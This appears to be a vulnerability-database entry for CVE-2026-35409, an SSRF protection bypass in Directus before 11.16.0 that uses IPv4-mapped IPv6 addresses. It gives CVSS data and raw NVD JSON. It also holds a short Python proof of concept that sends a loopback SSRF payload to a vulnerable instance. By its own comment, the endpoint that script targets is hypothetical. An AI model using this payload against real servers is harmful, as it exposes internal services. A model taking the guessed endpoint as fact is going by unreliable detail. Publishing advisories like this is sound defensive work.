Security Vulnerability Report
CVE-2026-35409 CVSS 7.7 HIGH

CVE-2026-35409

Published: 2026-04-06 22:16:22
Last Modified: 2026-04-20 16:47:30

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.0, a Server-Side Request Forgery (SSRF) protection bypass has been identified and fixed in Directus. The IP address validation mechanism used to block requests to local and private networks could be circumvented using IPv4-Mapped IPv6 address notation. This vulnerability is fixed in 11.16.0.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Weakness
CWE-918 (Server-Side Request Forgery)

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.16.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (example of a vulnerable Directus instance)
target_url = "http://vulnerable-directus-instance.com"

# Payload: an IPv4-mapped IPv6 address that the pre-11.16.0 private-network
# check does not recognise as loopback. 127.0.0.1 in IPv6 notation: ::ffff:127.0.0.1
ssrf_payload = "http://[::ffff:127.0.0.1]:8080/admin"

# Example endpoint that might be vulnerable (hypothetical, based on product type)
vulnerable_endpoint = f"{target_url}/items/proxy?url={ssrf_payload}"

try:
    response = requests.get(vulnerable_endpoint)
    if response.status_code == 200:
        print("Potential SSRF bypass successful!")
        print("Response snippet:", response.text[:200])
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

References

https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35409",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-06T22:16:21.930",
    "lastModified": "2026-04-20T16:47:30.363",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.0, a Server-Side Request Forgery (SSRF) protection bypass has been identified and fixed in Directus. The IP address validation mechanism used to block requests to local and private networks could be circumvented using IPv4-Mapped IPv6 address notation. This vulnerability is fixed in 11.16.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "11.16.0",
                "matchCriteriaId": "7287D07A-7E71-4728-8CEE-E6E450B34316"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}